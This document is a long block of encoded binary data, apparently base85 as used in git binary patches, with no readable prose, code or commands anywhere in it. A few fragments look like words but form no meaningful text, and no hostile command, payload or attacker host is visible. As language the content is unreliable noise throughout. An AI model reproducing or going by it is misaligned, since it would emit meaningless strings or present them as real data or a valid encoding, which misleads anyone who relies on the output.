zM`(+~&Ti5#1p+Ul0nSMH`Q8|pU?@T^`UDxGiDdBm@C41n=vkBAR4QB>&{TyIda35< zEIwf6glaUDk`JA8G13ML;Az&$bC6yt5=jl2k9BK=(5vZeco4z|a%7%@kOMis02oLJ z(wm`!huq($SaZj!QdiXFR%~tpU@G8U!4?q=)dE25h09358$pI40N3K}Rdq6rOB>)0 zj#ibUIZ9ANFw3SpUIHYBKLzF;9P6p-Er4IO3}M*VQ;jXCr+z1R1$$b;y!2He)?X9# zrf7SkN%Nclr1A=O#LPW;!)N`&;=w{tnHgAA)gzP%N%NljWxj~-qPpVPtO2^Xs_l9b z5mV^SF%R+GNjQiYAD~fHSTyOKg@hOYL#2v-O~jzbwMlGe@QD4`)FQX7DwXQi_-^_a zNMHJ01d%C@@MZMACM^3gSncA52p>nf*1b7R@AvgzrviFowUd{QcI!QJaVq^K0EM}l zI6@$elkC9=3dWHxy>MD^&A@HVg-X37Ju8Za`=et|W2WK2tIO4PhY^C~Lk^}G>S=8X zV#-CUagrZN<;A#~_CnoM9C;fZxEo;_2pEGkIcC1<6|{P`+f|n*w#bgLcj-7F$fTH3 z0sjiNmq7uS3!JVRzM;s0mQ`F~snoiNXm?87i+dC2lV?3iu<2FcnGZ~zV`;-!)ga3My4KU`EdmMr&xSmOnTo0n|~x@ zcAqPdEjjQdkKq2F293u3F9?)X&$z?=fovWZ;S(!Pra=(Uy}S0ymm*w^vZ4G;%0SRM z(h*ub6nH0Q+DX%$Q32NN34>NJr(0Dsae% zIm5Hy-WY9q7JAqKVa4XEALn$)5_&`qir5GnctO=C$5B!lDDCi*C!zGfEvGBtBd*ad zxm#8z&uUcAU$ed1dI+s|WjHrN?rw)#IlNjk*f=d7wDUU__vD=Ktw^b;a78GXqw!;k zt33nrHX&=l2p#-pg1##l=eo0SzoIkhGQ()f-8vVloXf~&K=h@Te%7~39D1*;`d+y( zxT%bObczXTZ}!#B>l>5dR=U1?UVKgbF@R{ktuub zGUq<`+w~t+87vB1RX8a)V(|R*2jECBq(pGa+Xv=Ff%%Vko;m%+H+UIEa^-2Hsj~uj zd;l&W*8Vm1G&fY06hjsr;KMIHpr*AZ@b zKAdzAW_&yR?CY)l1#7dG6Zzb{6E{Hc0jxiMNAQ3cagmI=JqM0OCu4U zu05BIFatlqsJH$ADrN0Wk+iTU5cWm~jgQ@@SE!XLpy=3XJc1SwThzEO&RH%>IzkoA z{C6Lo(^Iw;Wo@E`g0(Txq_uC{4)ndSBlPfRh6+)P`9IvO@d#za@1R@1)OoIQ7$Jmj z)5Xg-1sdALWc?(A=ahkW*mHeH8x1()qM|0>#y{;m=m?gU^Iy0P&W()?NQoT3^)>at z_gh|bMw240Sk79Gprlh;C)u^4Qe*&;Zu*zPm;-IUDZ12&D_V={m!85dPl zD^;J3KS-6*m#zoX5ay1?7{9kRl(=+}t2I;6lIck zFtP?vB*(EbZ9G;d((e48OuCdW(aMZ{bj=_SnG7n}e;nz}dVdI>%Yl^>)cv9HZoJY# zzc+gbu|8FM_IdJgHn5-qF`J7v>--fNwo2J6OuICkFJ}?kX&NO4T{jC2g;;rbBGM$A z_+@HP`s@c(GGroBP_pSe#v=jfYasVySx51d9yN=u_YqiwZU`-M!-dOOyCH_p6q@TS zl_Xa)fLtD-I$ze|Qe#{w&mBWR7gvZOMEtSw+LG6#uSZG7%U3o^CMZAJkxW$U z*Op4soQ{%8KKiavD&_c(9jR0T2YXRilkf#xI_c3O$Emg%5SJ`Ce|FZ98VK z7Y`NThsF@3?HrIwu~`lj%~q10T`ZfI9@!&4+nU=)9jV8@;(1Lt>_P;)IU9L<99nWT zz0HOmQMOjVF7IszNiwzunV)Y;CrpH8{w`UYG7unpeE zHxXL#Iz-A0tu0@^_on z2b3T0?x_!|4d@;o(&TI^&@+Blh0C~P@m4xVQpnR6j-Z@EmUH+%vT*P)R5eGZS5}f$ z>vJh@un|_oG~pv#`RkPev%zf;uhWIp0wn8j?yaWGQd_unH8%l`444pjVRO_^u#|mP z{OxP2{ew{_gxKP;xYA2=E5I}7SL>pIjThc0$eV*pvPOaU9?QY~#YZwoptkMB5#8T- zb`GXSYX(WTiv~UtP}`%ul6m;N-pCKR4~&+dzjZcSOuuagJ>9-K%jo3|nTpif`3*s3 zbiz9s9s0Tpd_>)fmh0H zdsm|%-{yiCPXyyenI)oaIvB95t@;f$7LDgJ1}Y`j#%|4`3pHbgg0l}x5q!>mJ2keF zpQ(YWIfEwZx8hTUG!RPFzLpo9#(!tuagsBE#6=Ch09Z2JMHCIYK6f4vM6kZ*15ZPg zsDVr{von)uooQk_C&G3tW_QRsqhEkiGlmGDc|zhZ_3_AmrtubbYS=AMrPYfxC<6Dw z$Qp^FaLBPEBzic$l$kfx`N(M=nyAACaCFmj#-K7z_l+@QGw7xMAdhRDlD5HbUO)gCrvw%_PC?34=ZoZu zL}z?5ixNv>-o`xN>Ax-$bLTWyw0JzdRdNHFcw#Osq2c8#(|5*cx#49Px9P>_K?_=~ zF>L38&8ADn*Ba=2Tk-y8PNF#r$zJ3%^X!o~B$)>O7`=H+pvGD;5_0TlqQ$MFbwsnN z(L_FmTAUcB&nJ9RY7)wyX5$ELqEhIPjdOo!t#!Ni+BMI4rKE*X@w@X&efE3{+Qo@9 zF|mhiHr-fV3`C|udcK9^%5SZH?`I(S_sICpsOvZBk9!erA} z{k_PR_sNBQZKF}F>&MSvwd@XSw}GU%+#NHdDT}Z|wm^8SHWkyFs(rg41N1f#um9sH zmyo0_1j)g-kQLQq3wWZSag>3AjN<`Dc+|O+N;D0QM>3#1WRX7%+F%Pw+ z@L;XtRmS;fg)xdwkDVMc+xbQ6i5+~4qhpO}VUjD(YbKTY+?U->dg*{If_po|d8AzoojN|FqI5iExJVRJpcq=pQ%4z{!v8BAM`Qv;V?<+l5O}hUXiUXv^v@@#3#vP^FA&rIoyjC zag-ssmB5*U^RqNfTCe?`l2gnTqNf0R2YIyJHTPSqv13npBP8P$eT0Zg@=v_p#&axW zrL+&)t;W-GVO~BPX+Y@oOk)JMI^wilGJ`#6Bc8=!5^^2f7;k_ugEo-F~d$G-314&`8p*`u|re{R6*qc zV*G}TlN)53ek1i}f^IVSsYwZE4UksXuY9y2$}c1>mEQ$pe%*#?c7gaj@TbZpe&^JW z?=sjF0^Io)nQRR**n_VH*Q@kdnzWE1+Xh+mNoqBPO9Tj$> z_Ab4A);;o+Xtn21>Yb*I$3Z!dKW9JHT|IpN``*x9!{|!|H+6ITDu(MlAt`&TW@*8*tsg}xEtt{ zo|`JQ%mURP$hi4@6OIhveybQ~oiCb>3{e+CjSIe634JCrKmb~}9S=cOK0P|~0mNJL zdb+%;69k?~`B`hplw#44D7@(U93;RTQh1HXB?f059Mu$u=Ds$?<=;L^V{^k?J~fXd z64EFLC>el}CPMI3HleIE0K`TH_D_N}=CAX&ibLfHN=k8)2EC!$v~Q%2%30TF)Qu}U z1wYr)`RfLRC?up3XiIkxCr45u?KwKQQ$hk#81ocn(=#3)bcJgn%v$12MA3n(SafU= z+Il1s!+tu?eV93?KYq$vJ!1Xc@eHb-;qs6JLQ=+P7Ff;O-G&r z_ZrjLn>!8I@Ywd#-GOP694Ld`8xpX7v75FcR}QK&4(6oZDz8KR@EVmUPUB&>GM9tq z#lR$v8{B5|IOrq*90QNKcKr%8hlX3AJ!2Ij@drm1Y^Y+lKe_w(xN7+n!D=Vev<5pj z1*K-=*fTM6nrHNs^q!`QUl^Q!HS5H#mBsBu;n^s>u*JK4e2P~E#QnR#!4b2SYD!Op zwI~&FYhWE(cm>9&0vGp|S{g0&plzX^g=(P-Xjmzp2S*SpCEOz=UU7rVFT;OLh}14{ zjJ{Njf=U*0EB3p?J=?{(Y$d?@hf4|GGouy(?b`TjQu8!izdLxxzJQ5?qv@i@i&N7) zF5byG8)b~noiWhDL&T`w6;@fnt))>6!M4}>R;2++bH?SKK802j(w!nzpu)bJ?-1g% zYo6Ph_?sH|5&~77K`3zX^l@x2UjdtVjGH8PqXZ-!HkkfsDVOdtmkm1A_Dqm2*Gu*r zY8)W${cWCDA7A%8!?Cb>C50=f#KyJo60TD-c4^6OFchDA^jI4ou8raA9yxCPn@rI8 zEak;PkRIJzVgr*ux>F*TVNJm)F85?yz{`XuG6CJ?0mCv)(xqY!ljhtLlvbaZ3+wbrR7M99Yh-7MSE`;!zi#BE5sVXuT=sWK@E{fFe{J2)U|=e zOSuDa7NHr|&{)|j=`&Gm$dOKdq;#cHOkM#jGm7YhpI=cj#cH3uD2(3Y8(U7fu>Bd8yUPT=R3kV@0i+ z^?GUE9u%&B#Aktzi;SCJgNh(b5l~AbABgKvtb{_=%u5I;YGZ7<* zcee~3n5CfNtK+`AAl%F|CY1YjZEU%^-$1i;PIe_*H;u2{zgGRu@=GdMZr6; z_bwZHmdb=XrwXgOz3ylhCG@W}WUn>WdN*CXD^z}0E&KXoo;&=RijUpqo4WTDTe?@8 zIqqJQR($&P?$h6jt?|80s6M}7WZhNgdTYgqqN#e1yB#N#It{BjE!O>b{9E0Wy1lEq zVau%wr4P#G8>Oob8!L7suRVGs*I!=M->=wzGoYp0e_+gi@Z$Ty_Vt1Cs)5?|p%+TS z{p-WOtA=5L!#vf`YVURhDUHcgkEsMETp*__;o$Yzjl%uc8TdG@j3P1-u*r8RW zG!~V3>3hnrDyt^dm1nxEXNEtx9Ic)WiW|><6*8P9iR+xZnLGKg zdY(sRLFnFsgvzTY%CjmeOIr7qj*ZMtD?^t*EWteIB~@0v@2v)@ym?fyXuqej7JF|k zStXfx@41CaY}&m8Zb5Gz-h2N&+U#le$gEm6RsHIP87nHT3>e{6Hm;<%ggX)q}>QGsAsUx*gM?OoQ zti@S|N=gM|oDYfrtdTjVE~_7S`a)<>Rfy~nB!*KRYoo4Uq^@wk7I#-&@oA{^!A)uY zP??lk<=3AD-mA#jw8@~=RF0690y>W5sw*{oh8#GoE?TQ78>Z%bNa~Mh)xBB`%P^HM zYMLJs^%}v-ReL3YE?%{se2d18r}gJKTQNSzZf*snLgDp>!~w)reQu=XZ~8l;!T~! zM-4N7ebQ|WGF)@%x<)#&;~=8GzfMm~31oSs-sYsHtx>)0$MD35?Mx{2A8KIzi&5tJ zzcF+#lJQ^A|9?UMAD`@gegE+(09V>NnH8YzA16mSUm^gj?` zN}qdiIRT&h=b(R;A8Vz5y2*>wY$by$8cw9WyVoNjyI$L%rPnP! z{!a!fzs<+}IZ*kpL|E;m)+bAX%Y8q7{&k@8|J%_2Uj-^_J>|8_6dd-6u+@F@-{jBc zzj3>@Rc-j60+s)Rwvo;a>o)sOg8u)e5%$j)D*wGk*gryqy)l_|8@~THwGAOPS?wy1 z|CI=92syYPy8j0Pm3#k5h04EkllS-kj~ZAQEa?1AGDZpAIU!n1NUchhvOCB50@}9C z@Nq?+dcT}q@jn@1{}vJE8_5WH?7-$VNNt)N+K7Dob9OViq4|yZ$BVE2b_44l4&DC+ z`Y-)+=stAhXvtrof0cf|kzJ!tC0Nz9h{?pb`PKhu1MAm^;FQNRZ!Eq&di85#KRz(` zZTQ=hpZ_NGKj(#MY+gO`Y};u=4f9WrHT(3c);~|L9@hTb^lHtC|DsnL!`{#Rx3;K7 zbK|F_-VDV*wMD9 z{VF|T2M5&~>h#OG$Nz)jZ}qdS4?Ez?My;>@H-x|cUqY|`m5?%G%dh*j zrx~n=_3$D+A&TPk%dv-b*IShR!tTDBSQTPxiBLWlosc@o_w8W!@t~9GcW17sHZ*;Y zQVIWvoqhYFrjQhPHbfYo;B z9lFtAdsc7jg1Vz>XF% zTXR*9`9|oCpEGL~4UhiUxk^n0^dye|2*^KtMt-KD6>hOf7yT#asy~lapR*tT`};|I zg_RHX)1nQ{u|GNgvBgd|pdp-?&$DiWnF?Y8li3Ua*o_u|PG0jA{ zO9|;&QN8fM11YR7Am_`*j^(+}#b0M(*p(>#xOAqc*88D5mm`1|p_YMkS}>^0wJ)7| zd>pFjF1>*7xCc5lXrw!$&s0al>}4V&oMGVh#ugLk+xW3QOeob5^QP%914vNRz5Tek z@Qb}Nz7QG%58e4;kffG)K%d??u$LR9=FgOt*bVs})xLYp9WnOO>uY_spak#b5Syz% z2?DWL$ZuIYpOUP|X$#IO@4^W8POVq&@l!A$C?^=eLqtvX-%}HEt}Vo1 zJ`uj378WcFb_h81aQt9~JJ*V^p-<)8i8E;vTZPy_H~HInS__{H1SQ>~GW=+zYtC_O zgD>rw4Z>30(vRg8iqOTv9AjXia4J5D08Tw)nVMWtsutx)Az*HUr_J1*J$HYYA31KpxDL%MC`);wAh)fd*6oO z^<2@Hfbt<&zumXG*zT>=ccikxmW!aRYV%XWg`cfW}bT z05aq<2!|d0#5SN{*V)a6zafT_)O;;wC4%Gpg&b5DWkcbVEpeaq14@fv7tc0hQKDjx zKcjB)60Wql@qzSEqMkpwP@<}|n&&RLFYz6?nG znJO7CHeytq{adWgC}7?_R`{)OMc`cbdQ#fb;ka-jP$mpU6FF^D+dw#ccqd30sVXZW zQQ^LL&D#f=28Yf7bYEyVmKJhsgL3hrL~bu=6$O&V88XGl3!j3*Gm9{zOW3e^q}mn2 z7BT{R7#(H`W$&@D(fGtRl{29EL$VB{v2*sohX|uL<)&}1iAsKElPE*;!yu`x!o*Hw zEC5sC;_Yo^4;m4Smy@K)Y7_b~bObC@PXNVEk#5Av|GI(=3`4hty;yO%P1qEt zF*roKEzXt(x>0CA6ae8tdZi4G@ggG9D#oNP7KExRco(dFj5!GAJ+8O_>C|qO`ekY# z)w;kAZEc}{|CB(Ds4FW6>Qt4stJ7W>zct!x(2t(MoTich^64nyHpXnIsr+dWW^!~J2KXEXZlzsf0~#45RzUe z+>xyy*C9JJ0w=74P*3vn<*=auAs++5`!u)PS&vk zBeIj)Lm5U9PPvjLuC)jOigGjr;lTBmhSzjqr9ApK)jZ`bJw(DJ2Q;EPxCkW!2DUfp zDGsa_-wN-<4l_zDfL^n$nuK=xOxmol0I|JHBhW@uPR=lYU9smUQu zOEI$5X%M2j_&7pk^=9`xj^}_M0_3^ulK$vmyabq0D&qkc9J_;#BwxQtYrR{BeW7ph z)6TSc2r9HckIIomc=k#ytR*l>jtAA@{PSxG#RO%&gYEKmr`q{SN8gAA5j*1M2}C_j z2%Jq{ge@Omk-Y}kC(@i&^Q{_qLaDaq4?0sbfqLSV8xRGe6}xS(@14&Ij&VPcnu)Q% zhF7xmb*AeN5y)KtiN9(Zt*h4M7id*o?FZ?bhw0?%FcMjrLN5lu%L}PVeEA{>{wnw1 zD<&9L3da7WnYs0{8qbXxOPM#UQ&&UNyD6>9LSL*BTSB{$kNgeJ`Z29J7RyjY9blmc zXujuPQV)yQNDufYa-m*wm3f+hWWFt)umesg|6WPV(rv;X?>^kBaF*N*6W!S&6gVU} z8c2L0NyEGLDpKSD_`%xfDQdCg6|7k{p)yWT5I>ae0rZCI%g`$+1skz-TQ}k|fINnvmyG3db;9Fple(<8?hma{qG-*``$Ch~ zNP0xdFKUdW4D8c&Z?`8w)azZUkH;?KCxKR~Se1g^`Jn-{Xsf2Z;y7Srx8U59F5nw? z>~R&C!twJW(~q^w3W60M5tQai^7TtpU^*cOZ96V}&b)Cmy|1e-nW+xJ7OIxK!HWBR zG5Sdcj6QyuRk-?1@!6T-QC1@PM4YA>V~O{=JN$s~ouIlFLDHJiE}H_n9w>8@K(oUR}G4$T&K zS>GsHv`q>~2<5R4KM!4=F>I2Nuoj(_(BqQS9Suae-w1L*P)4)>$CURU#>`%61D2{l z^9RYfY19XXNae61jvjn+XTRXMdkSY3^-)P_c;XHobW=R-78)GpN^V;|5s+w#aaZ$G z0x|FpSErWQdHET5g)Y$biEN1|umuF1QQ|%Ijhvtl zoCv+#x`jN6LO6H903TSs7AoGxUk2m%w81IC%HNq^K%vVIJA$b-vTTt>{OGiW&#O8c zpbERhG-?BTyaYVRi0(7&@5`L+W!c3FfdqrIXJz3#V89Cl)Jua4CjeW)z*AVmoF_u-vIC&VdEfU`N{e#?w6nx%)6~~Zw=9|3sQ>GetzMXc^>$2jo8otiwCX2 z$D^Xxb^ky*No%BR7Y!5b;(* znzpEhkw`4dR+%EHdX`Hn)mCJLO_(M6pi5s8jP7@j=Osj@jm3LSig>VeN<$#z8n>Qp z_N)fTS2lY&4A7ybpO~sLMi7yt2r5uQ3_*$yGJvd9=f|U>I%L?RZVbM~g5C5c>?O$9thJL? z5xP-ikW8qH(9$8RNjv=r$hA$E$899~fj`B~m(moGR#6LT65F(k(=TiSHJmas=*Um} z8RM7O3T@QNgV8jP?8D%UCAs(mYEttDULAn(v|fncJAeo)xftfnC5%SkyH(%N(s!Y> z?KIPBk91tmm6}n*m`z7W9l*16Ht~o_4JacOWsw}3g$jYb!J_0?U}2hvvJcmYfOXsh z5ZkH?XqD%+w_mF&Ql2IGbS$}L#p+qi!MK`Y(?FzEnv z@K%~rUNo(v3S9s}?U)2!=5?F`A;cto4=HNrn?v>fLyCn?>N5`g>Vt0zF210BC-+o+ zJsi{;N-GiF_AzMai<2z2Icx=!*GIrqqf2eD{aWxY5Fkkv8`%yFrQG1g#1x{Pt(kln zyj2=gWpfI!W6vLA(-G!CeMmnoZ^Oibf&Lu>iB|l1nq913A<&rguLbSBlNyX()5;qXRlalF{$BrIa$;yCg5z7CN5i;Y$TQ;d3g`GD$pNIV@ zj7oTEuOq}fxuC=qERmWQE3xOO&5Jz~OHKEFi(M2F)dW++KA*HXW#uo7+UWLO1)WV@ z#kd$Bdy@vVe$zZHkK(o=H#bDRM;t7dLAlY>GiuS!f*D_PasUSq&k~t0|usl0T=!wW7=ry`HCBu^ZX-pOG|R&!CLRw$Wi(H zY5792Hxty3#UEhyS|e5&qUzqT2w$#njB=9+Sy=5R+eofka87S=`JotJz8kkYE=t5M z6>sH5loZ)}0LQrZMr3~Fx`y?#K&xhNvlrB|1dD(vjW5M06g`f?<+imQWVsBykI-NVkb<0 zB3DGJM7dpJ)SKOFtcLXCzS`qc$*J-onso`OWzYJ>9?Pol|KD*_C{Gn_N;8!{a7UHb zy*#8yz!@)bwCe4iFQT@h;7agg8B^4ikRU#+^39^V5L>oMVy+vv_ zQU&+u0p7vR1cyY)Z&+Ee4z5b661xC|D!22Qo+U52(bdMK>kX90DgqwtXe25fselM> zJbznHT&zPvp{Z7PK;Wo!mVZ-DLKAmUlPzFgYv>{S_N=MPqh#Nwbb<`s%evb6G3!#! z1o&aQWQ{N^=hB3?C%Bo%=jqoYp2Hd_9@U{fXQ|^ankP6~p6^yX_pki^6FH@082{Yn z#BM>%XwETUHc-3DNAQxAKo9>MmT!~a!mKs%a zv%C?R#0~U>NUJ-EbmWrHmYo+WZV1_JjM44ifut&{PjWu$XFe{jP`0%-9eC98iragj zn~H3z8sIDvNE$&rTvp|bh_g`0D!nnBqShQ;^QgdR*mG>~!spRCk(&JLkC7h4qkErb zNg*D5!2S7G`F4(#eHU(Wh@bJ~<9NlL<2IXxEQrmEpJ1Q3RCE@x|2`9cO)hQ3C}0H^ zVGk^t+`T$F_WSuLDk%r^Sd*P-@k~Y;r}H|t>8YT(i#2!al$b@xcC7cNb>ip7+uhCE zii-;_=kDKNpPywrN<-Nw0N_o4mjzb;4cLjmIQzxCgB27TM5zgf-mbwk3go*-PVK&X z3EqEOOdV$_lFvC5g9er~e*>SDUK=S-PY33_q$36e5V9j+Un;`o_aj>Og>=cPNaMNp z2@@M_6Q$AFFbTxz*<8b4wVqc_%H}*j&K@tR2b$kGBwz&=X2l3?f{qPvEbl4wKlyAmBDDsdP29WujLMwOvO7};NfKx}7PW@bN8gjm(#E9Vo-D9yI9|lz-UOJ3T z1HQ%gT6($xI4>FW?bKRfl9;RNinKJb|(k`)oQ>+0%^}~;%B<2y;{u<6<7`#^msfPW5gJPaS*bJu#TK?bYSr>xLx6isSOq0a zRm;NTqn6qQf~t6~ESMY0_z9jJ?XL)KLUVQl=;$gsX%VF+AoIJWUh$3u=tJX6l-p)u z&jh_tBH|u;8LL#LY`xs@@_s47(n=EtGqipAwY~5-pWzjyguWn&lpI2lQ~YMISCEI} z=P!|`ZdTCYPv%bs+?x=@X3<#sO!YSst{rCriv@c?dGmGI6*9NpG_6qi0+nK-#wq!TxQ5@io#VyC8d*vV**RJ|twFVT{k z5Oz@=kM6{YW*O-y!-~TrHyI~rVuX}Vad-tpM*-lQ_8(J&lMgJ3X$MR% z4NMYEiico7*7O^rhmU=zw($2^^vmyO4aKGo4dKk0f|Q=SRk~`_)HPv>nfN zsMh&Yz_40djmJmL=^GY$Tt3vUXrUN0Ycv1tVP%yTm*-?a?l{R90IQjRwtZ$7hAeJG zd_DE2?XZ*I-TJRi0S_i3or4~4e{~LiTIS&rI-vQ@MS(|e(j{Ut;+t#KlKByrV`i$v z)KNa`wp1kFc3-hZ;!6VfIr(roG7s8E;nl(;s_%>oS-;0V-w^oJb$gwojYrF5p%J=UhOsES|5c%J-810@W4`KW^c*g4{xar# zzvWxv;f-%L@&eW;SB`4?By)^GThmvRDa5w=%!i7|M(I>z<%*yT0p-o4w;tF!EzfyY z`Uzr9H`L-DZxkp<+G{MI*v(NNmM;se&f`okk%SFP>g`(?ADGod-s0 z($&l;`8;L>E@`Vw`D4#JELj4J;yg?Y zM6Rw=z~?LKMT}{BMyaQ?@&#kFzYuM1%Padg=@c_>;k@Jrq>UMZm~;e)X7+g=$KKnk z5ogtg*M6?4nJXjdx0%2(ncf;b0+Qq_LUdn@&fedN0*E60?=QgMQzDW%aZSiXy)&^V z_GaFzN>@@7Q+;7{B8f;n9G_^?nOSqRJ^ z;zJPD0&!y7kkifs2t=d^Lt+__%aYN)l9$sfxUQgJ-4RH7AbRX=74P?|ftxR^>96HK zUd&eQ+pzZ%W6Y`C0d|1(C;YNgX+65#QDd0dGt}+fVZP#vK6+y0{K}x)iQQ}I*7YT~ zawE_EL1V7A*iH@ZNq0hjKEF+5ceta_dI+1Gn&`AynBl^wiS+t(u=?t1@le+Cp5i2~ zQsI~Uv!}`gXhyWZ(z#UzvZN~f=Wk1Sx0tq_@D z8uw)i^!z~P8+F5G!zK!%!!%v^lZzV?n;|t?gglYwrT>FWb&yIOz`yV2j-!f?USW`p6`)fbJIIfBJ&KS=Wnqt#EIE@pC2#<_&4P(1$_ z_~{yduV`7vxXd@3>UBGX@Ki2iX=I;}?K}W4G(NESxv@T~=xVay=Oba6IjT{Gl+?UC zmfL5o&tzh+dpB-5O|j&EN8;sOcf=p0Iu+P330!b%KVe&Hx4u9Kf5$67hw9EbSRM6P zaV_zQSZy>Qcjz&DlfWNGRc|zlf!GH;!}K{HS@ACmVw3l8#qv_(^c-sRUs;42b>=@i zzBdTMlpsBI4B$o>i=0@w5B8TIm2j`dJQ!DA`cV0W!5CqIinBELAYbn`+ev~a`X6tJ zu^J03JYlFGO;Toq8Fa=7jfa-MWT`F>Wc3PtjZ zG>Ew7aHtw5eEamBqq=o2=ak{p`nmgm2+7#)rBqKpbLC2i*WNt$?9yL|w%^iwC+zfhpW>s`6X&ySRU}nLuVR)bvXH>{`%=(uRS0VyHnSQ;!##XE`R)* zRKL89pZ@(9qV2~UQ^fm>CvSi1oD*){Gi_~irb(G#ow$Ka~A3kyO}20^?N2gfIr zT)^X)_*EMQH?!u-yW8S*r98W>xaFsDBz`DT8NvzK7jfEs+q-PqDm(O4*7Xj#JOOXv zM5_p50?mhXI|Aita7UVu5@^priV7(_tWi~pq>G1K?^qw8syBj2t@ISLmz6|>D_D?FlZP!V;HpF-FB%vhuO{cAlrQ%7t%~PXJ!=PViXx*bbi?|Sm|0= zX1AZbk;So|^MgiLW{j?`8~q{H8O7CeA)Mt~(_=2u8}i*K#)T9cK#IFe>gOa~Ad*@W z2!0x>d+`iX(hMnios_am@<}84?Bc-CE_yS`qm+~hHO>w&&bi!2Cgxl-BQ1-zW>pzo zAIC+H8w=Nw(o5R_-M)OBYF2Y!rda68_n@yXmOxSOzPy0JvxLD@o`VyY2Zzjt2AliGs)l+q2TaDy^|ywuuAA+R zh*>NSJ`oEroik(Ax)8_f%qF>5tN@EHmw~C$?B#XhG<0~j+5ByX`Gi3K`%K)2%cdKQ z{!dC4TV|HcXNd1#J$A1$FLmkrXl7F8GCb*N*`{duzTtpiDr9S13>*SLfQ;=e1LtT=Zmc+_w0yebKlI2DdZP9oQSWhGx-7Se;)oP zv2AaCuvTD{(`)eEmPIRLh>|}5793&Yel}h~0+$VPC1qpS2GCu@k`X=F6|%IewWPAu zK6QtQ8GXC{e*u3$fWH(Uwa*@{$S2)Tx&+boL{1;I%^8K#6y-aUG*bR_&K>2^$&5w+ zxD-w*6;A4O(-2)nH{DD-bKscTvt);RfGjsQ+ig1eOPn-)r8H~`n**Ci=|Wv zrPwIl)|n(%zC6y01<)uJ*iIG90rl2eMcI%YN88j)cvVxCeN@S0)_kp2Tvb?fP1J!M z(SsdUt4vuq-Pv@l**c)}!>U-I*4atEeR0G}CY3+qgy1EA?BHv{{)%RXHVCGd))WEZ5LA zTWCdFn5A3%>{tG@TcZVBb=A~Z#aY;WFv^YEl~r1@)mRwiRzbbfaBW-vdR<$TrB`)z z(X?G$4#9HUo+R=ntt7TTteb+KA*rgT8Yspc0#mAiW*QYJq z%$-^7G*;-%Ou=Q_puJu8J<_=)US73b-9_KV>|OUgPr|KT=}q0%b=Bl8VD3&dA>cVPK5eGtS}x ze%re>NEjYtmet^N?O8MyWEaj|{iR_rzE#1M;V;ErI=0_CZe~>UO%nfgMMJgwP689 zXD?0{gqFulg+7L!U;V{hDXwUzhDiE7Or7*facMBA#$wET#gtCdl?GD}&S!!i=>3K0 zelF;I?&)d1X+NG}y=CQZ#%X%~Y1UQfUuNo223|2H>bQ>H^tEJ3ermuD?0+=C>8T|tdgKp?QuGLKb;)_07%`Hi9UQ@I_<9S`$gm&gyCgH8_;zq`5!7gpnR>n!# z0+TFkl|F2iW^JF=X0bNP_igLCKIJr~VbQK>YF6g|ye8$&?(E0zV0?w;IUeV0K5gY* z?rTi#)!xfi-GVLXYOw9uyU+aUuutwFq(^FY+2kawJ#s9%u3(ck(5Navhg) z8mICqw{jcDavaz4E$8wiw{kGQaW9AQF)#D~F%NSoPjfUsb1!G}H+OR_hx0j?b1}E` zHOF%&r}H}p^EUVMI0y7P7xX^o@;^89Ku7dJSM);1@q7x9EJ2V1}O0$YMOfP)q{ z#5+iW7>I{>NOLTwmSRtcd9W5@Uv_41c4vQfXpeSjpLS}mc5A$nZ z=z{%DZdcTBdqsGKU--rC0)hANSg#iU6W{lIKd>cG0!dN=c_)I`Ht&OHcz*_Yksoizv(I5TPI0w(CmKb1#WZ(iWNCnqV zh1AvpK4|;{%lYPWWYW)l-4A{L)326!Uww9v0t%o2DIkR{U~!Z;Fx&rpgxr1Se}2F> z{pEj_I7kIn=X`{S0VObn*1vZGTlwoF-)2nCiSAg!gnsl-f4h_Z>2DSyu>LiO0UJmN z8;AjCFojg$_yN;*;{*sQ0tXT-Xz<`cV+t2CZ0PVIL}LUaQmkn4BF2mwF&fl3apS{} zAV(@3Nb)4glqy%UZ0YhP%$PD~(yVFoCeEBXck=A%^C!@tLWjmYXYMG{q)LyTJ4eP? zDk)2kN=apml{s`%w{q?3RVmSz2*;8&iL+qXv=lpfG@DZ7S%GTj(yeRvF5bL)_ww!Q z_b=eUf?pc_nzX6HR1^yTE2Uu7nBmBhyAEDk_A*?W2`lf+%+W1M&ox1FE^YcW>eQ-N zvu^GBHEf}bC7(-7VXI?>lXvqr2OIO|oCssPB>ma=NYOKu6L0SPIrQk#r&F(P-R^A3 zPoqvXQdMF0-r}eJ298$eMC1_9GnDJleM9yknah8#y#DZ#R6;JSAJKn$^f4zx*)*q(dp#g`v} z2jUl8e=yd_7K_1=rQdLHedM2gG?o=4jyK}yndMKiaD!M3fycsn_5)4T}0R>Vpltc_ojaep{F6n~iflan)r=9!7Xlki$rh2Me zY@LUes{#I~r;N0+87h(c#X4)PCb8GiuPr9YD6z#Fdn~faDoc{1=L|7K7Yn5_?PJD# z@vNp)avGUSXzD`6BTtiz_Nyv@tr}>qalR6ouyI#oX z=F9K8r) zit2z(PYv>r!zPV0*Ij%4HP~T4L?U7l#bHCxWvWE6mlh9&3^GJ0kwg;n$b$~v=*Tk< z-AWLV3Nk>A`}Cl;>RR=vz?JH*jpVj`GU6J~clF{4XDINH4;Sx1xqYpgAGQMzNHbcyG{WSg2$XI%c(M*xYICS4d=${{w_I@fL0DH(p!7} zJoM2^KRs(|Q}l)Gnwq{FN^IK))H6gRAtw1EX1iq+M5x)>?kM-ZwAB?2n=$ftYW(r4 z?j!&IIK7eY59s`;C%^#`uz&`%iS;Ow1acrnTiXN6Nm9q6pNt_6OCU$-Hnl0HWXmW# zGr|($5H0ky&t6J{m1p)OwZoNAfA*rs5n81iA zrh`Tt(FVz5=jISC!$Ozx=2DUm5596Bryr=qsbPMX%T`vqK!7H(admOJSRHSxujSAEEQ2;AX7M~lv;LBmm4YM_i|!E^N}fuA+$*{ zw{VexG!tr#YuqMjn8Ku0)0zqu<3Iy-L*YI2jKxzYMl-6>jlzbV6ahnr1bLKa#eoP< zF$N!q5C?4C(t$_;2|f*Z6O}$NDYGl7T6DD*iA1!70{ve}cskIX0(Gaw5$Z~GDnF!h zw5d*gYF!c`gQ?O$4svJ+8<=2)ObA93ws^uc7D56h$YLe4u!0qM;sPI#;Ho+Q>(oZX zCsK1jYFZ4LRuYClPnRBLmuRvKPU4`YU~Z2w|4a)R5_{5xD0Z^fC(#E!D>UX6IR( zaA4pW&|o36FmP)F;{qJ;puq|uzzkGzTOH`Y4Lk7x3wTfj;KJ1*SE9)OGd`7sD7>>_ z3Yk=;E~VE+PS>v$dtyzJu!MNlR4KAsf{SB<2lWDg102{xMCe;y`x?W)0ATV;@LOI> 